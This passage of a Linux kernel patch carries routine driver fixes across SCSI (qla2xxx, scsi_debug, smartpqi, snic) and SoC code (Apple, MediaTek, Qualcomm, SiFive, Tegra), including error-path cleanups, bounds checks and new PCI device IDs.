++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -110,6 +110,7 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 	struct qla_qpair *qpair = sp->qpair;
+ 	u32 handle;
+ 	unsigned long flags;
++	int sp_found = 0, cmdsp_found = 0;
+ 
+ 	if (sp->cmd_sp)
+ 		ql_dbg(ql_dbg_async, sp->vha, 0x507c,
+@@ -124,18 +125,21 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 	spin_lock_irqsave(qpair->qp_lock_ptr, flags);
+ 	for (handle = 1; handle < qpair->req->num_outstanding_cmds; handle++) {
+ 		if (sp->cmd_sp && (qpair->req->outstanding_cmds[handle] ==
+-		    sp->cmd_sp))
++		    sp->cmd_sp)) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
++			cmdsp_found = 1;
++		}
+ 
+ 		/* removing the abort */
+ 		if (qpair->req->outstanding_cmds[handle] == sp) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
++			sp_found = 1;
+ 			break;
+ 		}
+ 	}
+ 	spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
+ 
+-	if (sp->cmd_sp) {
++	if (cmdsp_found && sp->cmd_sp) {
+ 		/*
+ 		 * This done function should take care of
+ 		 * original command ref: INIT
+@@ -143,8 +147,10 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 		sp->cmd_sp->done(sp->cmd_sp, QLA_OS_TIMER_EXPIRED);
+ 	}
+ 
+-	abt->u.abt.comp_status = cpu_to_le16(CS_TIMEOUT);
+-	sp->done(sp, QLA_OS_TIMER_EXPIRED);
++	if (sp_found) {
++		abt->u.abt.comp_status = cpu_to_le16(CS_TIMEOUT);
++		sp->done(sp, QLA_OS_TIMER_EXPIRED);
++	}
+ }
+ 
+ static void qla24xx_abort_sp_done(srb_t *sp, int res)
+@@ -168,7 +174,6 @@ int qla24xx_async_abort_cmd(srb_t *cmd_sp, bool wait)
+ 	struct srb_iocb *abt_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+-	uint8_t bail;
+ 
+ 	/* ref: INIT for ABTS command */
+ 	sp = qla2xxx_get_qpair_sp(cmd_sp->vha, cmd_sp->qpair, cmd_sp->fcport,
+@@ -176,7 +181,7 @@ int qla24xx_async_abort_cmd(srb_t *cmd_sp, bool wait)
+ 	if (!sp)
+ 		return QLA_MEMORY_ALLOC_FAILED;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
++	qla_vha_mark_busy(vha);
+ 	abt_iocb = &sp->u.iocb_cmd;
+ 	sp->type = SRB_ABT_CMD;
+ 	sp->name = "abort";
+@@ -2020,14 +2025,13 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ 	struct srb_iocb *tm_iocb;
+ 	srb_t *sp;
+ 	int rval = QLA_FUNCTION_FAILED;
+-	uint8_t bail;
+ 
+ 	/* ref: INIT */
+ 	sp = qla2x00_get_sp(vha, fcport, GFP_KERNEL);
+ 	if (!sp)
+ 		goto done;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
++	qla_vha_mark_busy(vha);
+ 	sp->type = SRB_TM_CMD;
+ 	sp->name = "tmf";
+ 	qla2x00_init_async_sp(sp, qla2x00_get_async_timeout(vha),
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index db17f7f410cdd..5185dc5daf80d 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -225,11 +225,9 @@ static inline srb_t *
+ qla2x00_get_sp(scsi_qla_host_t *vha, fc_port_t *fcport, gfp_t flag)
+ {
+ 	srb_t *sp = NULL;
+-	uint8_t bail;
+ 	struct qla_qpair *qpair;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
+-	if (unlikely(bail))
++	if (unlikely(qla_vha_mark_busy(vha)))
+ 		return NULL;
+ 
+ 	qpair = vha->hw->base_qpair;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 2c85f3cce7264..96ba1398f20c1 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -5069,13 +5069,11 @@ struct qla_work_evt *
+ qla2x00_alloc_work(struct scsi_qla_host *vha, enum qla_work_type type)
+ {
+ 	struct qla_work_evt *e;
+-	uint8_t bail;
+ 
+ 	if (test_bit(UNLOADING, &vha->dpc_flags))
+ 		return NULL;
+ 
+-	QLA_VHA_MARK_BUSY(vha, bail);
+-	if (bail)
++	if (qla_vha_mark_busy(vha))
+ 		return NULL;
+ 
+ 	e = kzalloc(sizeof(struct qla_work_evt), GFP_ATOMIC);
+diff --git a/drivers/scsi/scsi_debug.c b/drivers/scsi/scsi_debug.c
+index bebda917b1383..b77035ddc9440 100644
+--- a/drivers/scsi/scsi_debug.c
++++ b/drivers/scsi/scsi_debug.c
+@@ -3785,7 +3785,7 @@ static int resp_write_scat(struct scsi_cmnd *scp,
+ 		mk_sense_buffer(scp, ILLEGAL_REQUEST, INVALID_FIELD_IN_CDB, 0);
+ 		return illegal_condition_result;
+ 	}
+-	lrdp = kzalloc(lbdof_blen, GFP_ATOMIC);
++	lrdp = kzalloc(lbdof_blen, GFP_ATOMIC | __GFP_NOWARN);
+ 	if (lrdp == NULL)
+ 		return SCSI_MLQUEUE_HOST_BUSY;
+ 	if (sdebug_verbose)
+@@ -4436,7 +4436,7 @@ static int resp_verify(struct scsi_cmnd *scp, struct sdebug_dev_info *devip)
+ 	if (ret)
+ 		return ret;
+ 
+-	arr = kcalloc(lb_size, vnum, GFP_ATOMIC);
++	arr = kcalloc(lb_size, vnum, GFP_ATOMIC | __GFP_NOWARN);
+ 	if (!arr) {
+ 		mk_sense_buffer(scp, ILLEGAL_REQUEST, INSUFF_RES_ASC,
+ 				INSUFF_RES_ASCQ);
+@@ -4504,7 +4504,7 @@ static int resp_report_zones(struct scsi_cmnd *scp,
+ 
+ 	rep_max_zones = (alloc_len - 64) >> ilog2(RZONES_DESC_HD);
+ 
+-	arr = kzalloc(alloc_len, GFP_ATOMIC);
++	arr = kzalloc(alloc_len, GFP_ATOMIC | __GFP_NOWARN);
+ 	if (!arr) {
+ 		mk_sense_buffer(scp, ILLEGAL_REQUEST, INSUFF_RES_ASC,
+ 				INSUFF_RES_ASCQ);
+@@ -7340,7 +7340,10 @@ clean:
+ 		kfree(sdbg_devinfo->zstate);
+ 		kfree(sdbg_devinfo);
+ 	}
+-	kfree(sdbg_host);
++	if (sdbg_host->dev.release)
++		put_device(&sdbg_host->dev);
++	else
++		kfree(sdbg_host);
+ 	pr_warn("%s: failed, errno=%d\n", __func__, -error);
+ 	return error;
+ }
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 6995c89792300..02520f9123066 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -343,19 +343,11 @@ enum blk_eh_timer_return scsi_timeout(struct request *req)
+ 
+ 	if (rtn == BLK_EH_DONE) {
+ 		/*
+-		 * Set the command to complete first in order to prevent a real
+-		 * completion from releasing the command while error handling
+-		 * is using it. If the command was already completed, then the
+-		 * lower level driver beat the timeout handler, and it is safe
+-		 * to return without escalating error recovery.
+-		 *
+-		 * If timeout handling lost the race to a real completion, the
+-		 * block layer may ignore that due to a fake timeout injection,
+-		 * so return RESET_TIMER to allow error handling another shot
+-		 * at this command.
++		 * If scsi_done() has already set SCMD_STATE_COMPLETE, do not
++		 * modify *scmd.
+ 		 */
+ 		if (test_and_set_bit(SCMD_STATE_COMPLETE, &scmd->state))
+-			return BLK_EH_RESET_TIMER;
++			return BLK_EH_DONE;
+ 		if (scsi_abort_command(scmd) != SUCCESS) {
+ 			set_host_byte(scmd, DID_TIME_OUT);
+ 			scsi_eh_scmd_add(scmd);
+diff --git a/drivers/scsi/smartpqi/smartpqi.h b/drivers/scsi/smartpqi/smartpqi.h
+index e550b12e525a1..c8235f15728bb 100644
+--- a/drivers/scsi/smartpqi/smartpqi.h
++++ b/drivers/scsi/smartpqi/smartpqi.h
+@@ -1130,7 +1130,7 @@ struct pqi_scsi_dev {
+ 	u8	phy_id;
+ 	u8	ncq_prio_enable;
+ 	u8	ncq_prio_support;
+-	u8	multi_lun_device_lun_count;
++	u8	lun_count;
+ 	bool	raid_bypass_configured;	/* RAID bypass configured */
+ 	bool	raid_bypass_enabled;	/* RAID bypass enabled */
+ 	u32	next_bypass_group[RAID_MAP_MAX_DATA_DISKS_PER_ROW];
+diff --git a/drivers/scsi/smartpqi/smartpqi_init.c b/drivers/scsi/smartpqi/smartpqi_init.c
+index b971fbe3b3a17..9f0f69c1ed665 100644
+--- a/drivers/scsi/smartpqi/smartpqi_init.c
++++ b/drivers/scsi/smartpqi/smartpqi_init.c
+@@ -1610,9 +1610,7 @@ static int pqi_get_physical_device_info(struct pqi_ctrl_info *ctrl_info,
+ 		&id_phys->alternate_paths_phys_connector,
+ 		sizeof(device->phys_connector));
+ 	device->bay = id_phys->phys_bay_in_box;
+-	device->multi_lun_device_lun_count = id_phys->multi_lun_device_lun_count;
+-	if (!device->multi_lun_device_lun_count)
+-		device->multi_lun_device_lun_count = 1;
++	device->lun_count = id_phys->multi_lun_device_lun_count;
+ 	if ((id_phys->even_more_flags & PQI_DEVICE_PHY_MAP_SUPPORTED) &&
+ 		id_phys->phy_count)
+ 		device->phy_id =
+@@ -1746,7 +1744,7 @@ out:
+ 	return offline;
+ }
+ 
+-static int pqi_get_device_info(struct pqi_ctrl_info *ctrl_info,
++static int pqi_get_device_info_phys_logical(struct pqi_ctrl_info *ctrl_info,
+ 	struct pqi_scsi_dev *device,
+ 	struct bmic_identify_physical_device *id_phys)
+ {
+@@ -1763,6 +1761,20 @@ static int pqi_get_device_info(struct pqi_ctrl_info *ctrl_info,
+ 	return rc;
+ }
+ 
++static int pqi_get_device_info(struct pqi_ctrl_info *ctrl_info,
++	struct pqi_scsi_dev *device,
++	struct bmic_identify_physical_device *id_phys)
++{
++	int rc;
++
++	rc = pqi_get_device_info_phys_logical(ctrl_info, device, id_phys);
++
++	if (rc == 0 && device->lun_count == 0)
++		device->lun_count = 1;
++
++	return rc;
++}
++
+ static void pqi_show_volume_status(struct pqi_ctrl_info *ctrl_info,
+ 	struct pqi_scsi_dev *device)
+ {
+@@ -1897,7 +1909,7 @@ static inline void pqi_remove_device(struct pqi_ctrl_info *ctrl_info, struct pqi
+ 	int rc;
+ 	int lun;
+ 
+-	for (lun = 0; lun < device->multi_lun_device_lun_count; lun++) {
++	for (lun = 0; lun < device->lun_count; lun++) {
+ 		rc = pqi_device_wait_for_pending_io(ctrl_info, device, lun,
+ 			PQI_REMOVE_DEVICE_PENDING_IO_TIMEOUT_MSECS);
+ 		if (rc)
+@@ -2076,6 +2088,7 @@ static void pqi_scsi_update_device(struct pqi_ctrl_info *ctrl_info,
+ 	existing_device->sas_address = new_device->sas_address;
+ 	existing_device->queue_depth = new_device->queue_depth;
+ 	existing_device->device_offline = false;
++	existing_device->lun_count = new_device->lun_count;
+ 
+ 	if (pqi_is_logical_device(existing_device)) {
+ 		existing_device->is_external_raid_device = new_device->is_external_raid_device;
+@@ -2108,10 +2121,6 @@ static void pqi_scsi_update_device(struct pqi_ctrl_info *ctrl_info,
+ 		existing_device->phy_connected_dev_type = new_device->phy_connected_dev_type;
+ 		memcpy(existing_device->box, new_device->box, sizeof(existing_device->box));
+ 		memcpy(existing_device->phys_connector, new_device->phys_connector, sizeof(existing_device->phys_connector));
+-
+-		existing_device->multi_lun_device_lun_count = new_device->multi_lun_device_lun_count;
+-		if (existing_device->multi_lun_device_lun_count == 0)
+-			existing_device->multi_lun_device_lun_count = 1;
+ 	}
+ }
+ 
+@@ -6484,6 +6493,12 @@ static void pqi_slave_destroy(struct scsi_device *sdev)
+ 		return;
+ 	}
+ 
++	device->lun_count--;
++	if (device->lun_count > 0) {
++		mutex_unlock(&ctrl_info->scan_mutex);
++		return;
++	}
++
+ 	spin_lock_irqsave(&ctrl_info->scsi_device_list_lock, flags);
+ 	list_del(&device->scsi_device_list_entry);
+ 	spin_unlock_irqrestore(&ctrl_info->scsi_device_list_lock, flags);
+@@ -9302,6 +9317,10 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x193d, 0x1109)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x193d, 0x110b)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x193d, 0x8460)
+@@ -9402,6 +9421,22 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x1bd4, 0x0072)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0086)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0087)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0088)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       0x1bd4, 0x0089)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       0x19e5, 0xd227)
+@@ -9650,6 +9685,10 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x1474)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       PCI_VENDOR_ID_ADAPTEC2, 0x1475)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x1480)
+@@ -9706,6 +9745,14 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x14c2)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       PCI_VENDOR_ID_ADAPTEC2, 0x14c3)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++			       PCI_VENDOR_ID_ADAPTEC2, 0x14c4)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_ADAPTEC2, 0x14d0)
+@@ -9942,6 +9989,18 @@ static const struct pci_device_id pqi_pci_id_table[] = {
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_VENDOR_ID_LENOVO, 0x0623)
+ 	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++				0x1e93, 0x1000)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++				0x1e93, 0x1001)
++	},
++	{
++		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
++				0x1e93, 0x1002)
++	},
+ 	{
+ 		PCI_DEVICE_SUB(PCI_VENDOR_ID_ADAPTEC2, 0x028f,
+ 			       PCI_ANY_ID, PCI_ANY_ID)
+diff --git a/drivers/scsi/snic/snic_disc.c b/drivers/scsi/snic/snic_disc.c
+index 9b2b5f8c23b9a..8fbf3c1b1311d 100644
+--- a/drivers/scsi/snic/snic_disc.c
++++ b/drivers/scsi/snic/snic_disc.c
+@@ -304,6 +304,9 @@ snic_tgt_create(struct snic *snic, struct snic_tgt_id *tgtid)
+ 			      ret);
+ 
+ 		put_device(&snic->shost->shost_gendev);
++		spin_lock_irqsave(snic->shost->host_lock, flags);
++		list_del(&tgt->list);
++		spin_unlock_irqrestore(snic->shost->host_lock, flags);
+ 		kfree(tgt);
+ 		tgt = NULL;
+ 
+diff --git a/drivers/soc/apple/rtkit.c b/drivers/soc/apple/rtkit.c
+index 031ec4aa06d55..8ec74d7539eb4 100644
+--- a/drivers/soc/apple/rtkit.c
++++ b/drivers/soc/apple/rtkit.c
+@@ -926,8 +926,10 @@ int apple_rtkit_wake(struct apple_rtkit *rtk)
+ }
+ EXPORT_SYMBOL_GPL(apple_rtkit_wake);
+ 
+-static void apple_rtkit_free(struct apple_rtkit *rtk)
++static void apple_rtkit_free(void *data)
+ {
++	struct apple_rtkit *rtk = data;
++
+ 	mbox_free_channel(rtk->mbox_chan);
+ 	destroy_workqueue(rtk->wq);
+ 
+@@ -950,8 +952,7 @@ struct apple_rtkit *devm_apple_rtkit_init(struct device *dev, void *cookie,
+ 	if (IS_ERR(rtk))
+ 		return rtk;
+ 
+-	ret = devm_add_action_or_reset(dev, (void (*)(void *))apple_rtkit_free,
+-				       rtk);
++	ret = devm_add_action_or_reset(dev, apple_rtkit_free, rtk);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+diff --git a/drivers/soc/apple/sart.c b/drivers/soc/apple/sart.c
+index 83804b16ad03d..afa1117368997 100644
+--- a/drivers/soc/apple/sart.c
++++ b/drivers/soc/apple/sart.c
+@@ -164,6 +164,11 @@ static int apple_sart_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
++static void apple_sart_put_device(void *dev)
++{
++	put_device(dev);
++}
++
+ struct apple_sart *devm_apple_sart_get(struct device *dev)
+ {
+ 	struct device_node *sart_node;
+@@ -187,7 +192,7 @@ struct apple_sart *devm_apple_sart_get(struct device *dev)
+ 		return ERR_PTR(-EPROBE_DEFER);
+ 	}
+ 
+-	ret = devm_add_action_or_reset(dev, (void (*)(void *))put_device,
++	ret = devm_add_action_or_reset(dev, apple_sart_put_device,
+ 				       &sart_pdev->dev);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+diff --git a/drivers/soc/mediatek/mtk-pm-domains.c b/drivers/soc/mediatek/mtk-pm-domains.c
+index 09e3c38b84664..474b272f9b02d 100644
+--- a/drivers/soc/mediatek/mtk-pm-domains.c
++++ b/drivers/soc/mediatek/mtk-pm-domains.c
+@@ -275,9 +275,9 @@ static int scpsys_power_off(struct generic_pm_domain *genpd)
+ 	clk_bulk_disable_unprepare(pd->num_subsys_clks, pd->subsys_clks);
+ 
+ 	/* subsys power off */
+-	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_RST_B_BIT);
+ 	regmap_set_bits(scpsys->base, pd->data->ctl_offs, PWR_ISO_BIT);
+ 	regmap_set_bits(scpsys->base, pd->data->ctl_offs, PWR_CLK_DIS_BIT);
++	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_RST_B_BIT);
+ 	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_ON_2ND_BIT);
+ 	regmap_clear_bits(scpsys->base, pd->data->ctl_offs, PWR_ON_BIT);
+ 
+diff --git a/drivers/soc/qcom/apr.c b/drivers/soc/qcom/apr.c
+index b4046f393575e..cd44f17dad3d0 100644
+--- a/drivers/soc/qcom/apr.c
++++ b/drivers/soc/qcom/apr.c
+@@ -454,11 +454,19 @@ static int apr_add_device(struct device *dev, struct device_node *np,
+ 	adev->dev.driver = NULL;
+ 
+ 	spin_lock(&apr->svcs_lock);
+-	idr_alloc(&apr->svcs_idr, svc, svc_id, svc_id + 1, GFP_ATOMIC);
++	ret = idr_alloc(&apr->svcs_idr, svc, svc_id, svc_id + 1, GFP_ATOMIC);
+ 	spin_unlock(&apr->svcs_lock);
++	if (ret < 0) {
++		dev_err(dev, "idr_alloc failed: %d\n", ret);
++		goto out;
++	}
+ 
+-	of_property_read_string_index(np, "qcom,protection-domain",
+-				      1, &adev->service_path);
++	ret = of_property_read_string_index(np, "qcom,protection-domain",
++					    1, &adev->service_path);
++	if (ret < 0) {
++		dev_err(dev, "Failed to read second value of qcom,protection-domain\n");
++		goto out;
++	}
+ 
+ 	dev_info(dev, "Adding APR/GPR dev: %s\n", dev_name(&adev->dev));
+ 
+@@ -468,6 +476,7 @@ static int apr_add_device(struct device *dev, struct device_node *np,
+ 		put_device(&adev->dev);
+ 	}
+ 
++out:
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 8b7e8118f3cec..82c3cfdcc5601 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -849,7 +849,7 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err;
+ 
+-	drv_data->ecc_irq = platform_get_irq(pdev, 0);
++	drv_data->ecc_irq = platform_get_irq_optional(pdev, 0);
+ 	if (drv_data->ecc_irq >= 0) {
+ 		llcc_edac = platform_device_register_data(&pdev->dev,
+ 						"qcom_llcc_edac", -1, drv_data,
+diff --git a/drivers/soc/sifive/sifive_ccache.c b/drivers/soc/sifive/sifive_ccache.c
+index 1c171150e878d..3684f5b40a80e 100644
+--- a/drivers/soc/sifive/sifive_ccache.c
++++ b/drivers/soc/sifive/sifive_ccache.c
+@@ -215,20 +215,27 @@ static int __init sifive_ccache_init(void)
+ 	if (!np)
+ 		return -ENODEV;
+ 
+-	if (of_address_to_resource(np, 0, &res))
+-		return -ENODEV;
++	if (of_address_to_resource(np, 0, &res)) {
++		rc = -ENODEV;
++		goto err_node_put;
++	}
+ 
+ 	ccache_base = ioremap(res.start, resource_size(&res));
+-	if (!ccache_base)
+-		return -ENOMEM;
++	if (!ccache_base) {
++		rc = -ENOMEM;
++		goto err_node_put;
++	}
+ 
+-	if (of_property_read_u32(np, "cache-level", &level))
+-		return -ENOENT;
++	if (of_property_read_u32(np, "cache-level", &level)) {
++		rc = -ENOENT;
++		goto err_unmap;
++	}
+ 
+ 	intr_num = of_property_count_u32_elems(np, "interrupts");
+ 	if (!intr_num) {
+ 		pr_err("No interrupts property\n");
+-		return -ENODEV;
++		rc = -ENODEV;
++		goto err_unmap;
+ 	}
+ 
+ 	for (i = 0; i < intr_num; i++) {
+@@ -237,9 +244,10 @@ static int __init sifive_ccache_init(void)
+ 				 NULL);
+ 		if (rc) {
+ 			pr_err("Could not request IRQ %d\n", g_irq[i]);
+-			return rc;
++			goto err_free_irq;
+ 		}
+ 	}
++	of_node_put(np);
+ 
+ 	ccache_config_read();
+ 
+@@ -250,6 +258,15 @@ static int __init sifive_ccache_init(void)
+ 	setup_sifive_debug();
+ #endif
+ 	return 0;
++
++err_free_irq:
++	while (--i >= 0)
++		free_irq(g_irq[i], NULL);
++err_unmap:
++	iounmap(ccache_base);
++err_node_put:
++	of_node_put(np);
++	return rc;
+ }
+ 
+ device_initcall(sifive_ccache_init);
+diff --git a/drivers/soc/tegra/cbb/tegra194-cbb.c b/drivers/soc/tegra/cbb/tegra194-cbb.c
+index 1ae0bd9a1ac1b..2e952c6f7c9e3 100644
+--- a/drivers/soc/tegra/cbb/tegra194-cbb.c
++++ b/drivers/soc/tegra/cbb/tegra194-cbb.c
+@@ -102,8 +102,6 @@
+ #define CLUSTER_NOC_VQC GENMASK(17, 16)
+ #define CLUSTER_NOC_MSTR_ID GENMASK(21, 18)
+ 
+-#define USRBITS_MSTR_ID GENMASK(21, 18)
+-
+ #define CBB_ERR_OPC GENMASK(4, 1)
+ #define CBB_ERR_ERRCODE GENMASK(10, 8)
+ #define CBB_ERR_LEN1 GENMASK(27, 16)
+@@ -2038,15 +2036,17 @@ static irqreturn_t tegra194_cbb_err_isr(int irq, void *data)
+ 					    smp_processor_id(), priv->noc->name, priv->res->start,
+ 					    irq);
+ 
+-			mstr_id =  FIELD_GET(USRBITS_MSTR_ID, priv->errlog5) - 1;
+ 			is_fatal = print_errlog(NULL, priv, status);
+ 
+ 			/*
+-			 * If illegal request is from CCPLEX(0x1)
+-			 * initiator then call BUG() to crash system.
++			 * If illegal request is from CCPLEX(0x1) initiator
++			 * and error is fatal then call BUG() to crash system.
+ 			 */
+-			if ((mstr_id == 0x1) && priv->noc->erd_mask_inband_err)
+-				is_inband_err = 1;
++			if (priv->noc->erd_mask_inband_err) {
++				mstr_id =  FIELD_GET(CBB_NOC_MSTR_ID, priv->errlog5);
++				if (mstr_id == 0x1)
++					is_inband_err = 1;
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/soc/tegra/cbb/tegra234-cbb.c b/drivers/soc/tegra/cbb/tegra234-cbb.c
+index 3528f9e15d5c0..f33d094e5ea60 100644
+--- a/drivers/soc/tegra/cbb/tegra234-cbb.c
++++ b/drivers/soc/tegra/cbb/tegra234-cbb.c
+@@ -72,6 +72,11 @@
+ 
+ #define REQ_SOCKET_ID			GENMASK(27, 24)
+ 
++#define CCPLEX_MSTRID			0x1
++#define FIREWALL_APERTURE_SZ		0x10000
++/* Write firewall check enable */
++#define WEN				0x20000
++
+ enum tegra234_cbb_fabric_ids {
+ 	CBB_FAB_ID,
+ 	SCE_FAB_ID,
+@@ -92,11 +97,15 @@ struct tegra234_slave_lookup {
+ struct tegra234_cbb_fabric {
+ 	const char *name;
+ 	phys_addr_t off_mask_erd;
+-	bool erd_mask_inband_err;
++	phys_addr_t firewall_base;
++	unsigned int firewall_ctl;
++	unsigned int firewall_wr_ctl;
+ 	const char * const *master_id;
+ 	unsigned int notifier_offset;
+ 	const struct tegra_cbb_error *errors;
++	const int max_errors;
+ 	const struct tegra234_slave_lookup *slave_map;
++	const int max_slaves;
+ };
+ 
+ struct tegra234_cbb {
+@@ -128,6 +137,44 @@ static inline struct tegra234_cbb *to_tegra234_cbb(struct tegra_cbb *cbb)
+ static LIST_HEAD(cbb_list);
+ static DEFINE_SPINLOCK(cbb_lock);
+ 
++static bool
++tegra234_cbb_write_access_allowed(struct platform_device *pdev, struct tegra234_cbb *cbb)
++{
++	u32 val;
++
++	if (!cbb->fabric->firewall_base ||
++	    !cbb->fabric->firewall_ctl ||
++	    !cbb->fabric->firewall_wr_ctl) {
++		dev_info(&pdev->dev, "SoC data missing for firewall\n");
++		return false;
++	}
++
++	if ((cbb->fabric->firewall_ctl > FIREWALL_APERTURE_SZ) ||
++	    (cbb->fabric->firewall_wr_ctl > FIREWALL_APERTURE_SZ)) {
++		dev_err(&pdev->dev, "wrong firewall offset value\n");
++		return false;
++	}
++
++	val = readl(cbb->regs + cbb->fabric->firewall_base + cbb->fabric->firewall_ctl);
++	/*
++	 * If the firewall check feature for allowing or blocking the
++	 * write accesses through the firewall of a fabric is disabled
++	 * then CCPLEX can write to the registers of that fabric.
++	 */
++	if (!(val & WEN))
++		return true;
++
++	/*
++	 * If the firewall check is enabled then check whether CCPLEX
++	 * has write access to the fabric's error notifier registers
++	 */
++	val = readl(cbb->regs + cbb->fabric->firewall_base + cbb->fabric->firewall_wr_ctl);
++	if (val & (BIT(CCPLEX_MSTRID)))
++		return true;
++
++	return false;
++}
++
+ static void tegra234_cbb_fault_enable(struct tegra_cbb *cbb)
+ {
+ 	struct tegra234_cbb *priv = to_tegra234_cbb(cbb);
+@@ -271,6 +318,12 @@ static void tegra234_cbb_print_error(struct seq_file *file, struct tegra234_cbb
+ 		tegra_cbb_print_err(file, "\t  Multiple type of errors reported\n");
+ 
+ 	while (status) {
++		if (type >= cbb->fabric->max_errors) {
++			tegra_cbb_print_err(file, "\t  Wrong type index:%u, status:%u\n",
++					    type, status);
++			return;
++		}
++
+ 		if (status & 0x1)
+ 			tegra_cbb_print_err(file, "\t  Error Code\t\t: %s\n",
+ 					    cbb->fabric->errors[type].code);
+@@ -282,6 +335,12 @@ static void tegra234_cbb_print_error(struct seq_file *file, struct tegra234_cbb
+ 	type = 0;
+ 
+ 	while (overflow) {
++		if (type >= cbb->fabric->max_errors) {
++			tegra_cbb_print_err(file, "\t  Wrong type index:%u, overflow:%u\n",
++					    type, overflow);
++			return;
++		}
++
+ 		if (overflow & 0x1)
+ 			tegra_cbb_print_err(file, "\t  Overflow\t\t: Multiple %s\n",
+ 					    cbb->fabric->errors[type].code);
+@@ -334,8 +393,11 @@ static void print_errlog_err(struct seq_file *file, struct tegra234_cbb *cbb)
+ 	access_type = FIELD_GET(FAB_EM_EL_ACCESSTYPE, cbb->mn_attr0);
+ 
+ 	tegra_cbb_print_err(file, "\n");
+-	tegra_cbb_print_err(file, "\t  Error Code\t\t: %s\n",
+-			    cbb->fabric->errors[cbb->type].code);
++	if (cbb->type < cbb->fabric->max_errors)
++		tegra_cbb_print_err(file, "\t  Error Code\t\t: %s\n",
++				    cbb->fabric->errors[cbb->type].code);
++	else
++		tegra_cbb_print_err(file, "\t  Wrong type index:%u\n", cbb->type);
+ 
+ 	tegra_cbb_print_err(file, "\t  MASTER_ID\t\t: %s\n", cbb->fabric->master_id[mstr_id]);
+ 	tegra_cbb_print_err(file, "\t  Address\t\t: %#llx\n", cbb->access);
+@@ -374,6 +436,11 @@ static void print_errlog_err(struct seq_file *file, struct tegra234_cbb *cbb)
+ 	if ((fab_id == PSC_FAB_ID) || (fab_id == FSI_FAB_ID))
+ 		return;
+ 
++	if (slave_id >= cbb->fabric->max_slaves) {
++		tegra_cbb_print_err(file, "\t  Invalid slave_id:%d\n", slave_id);
++		return;
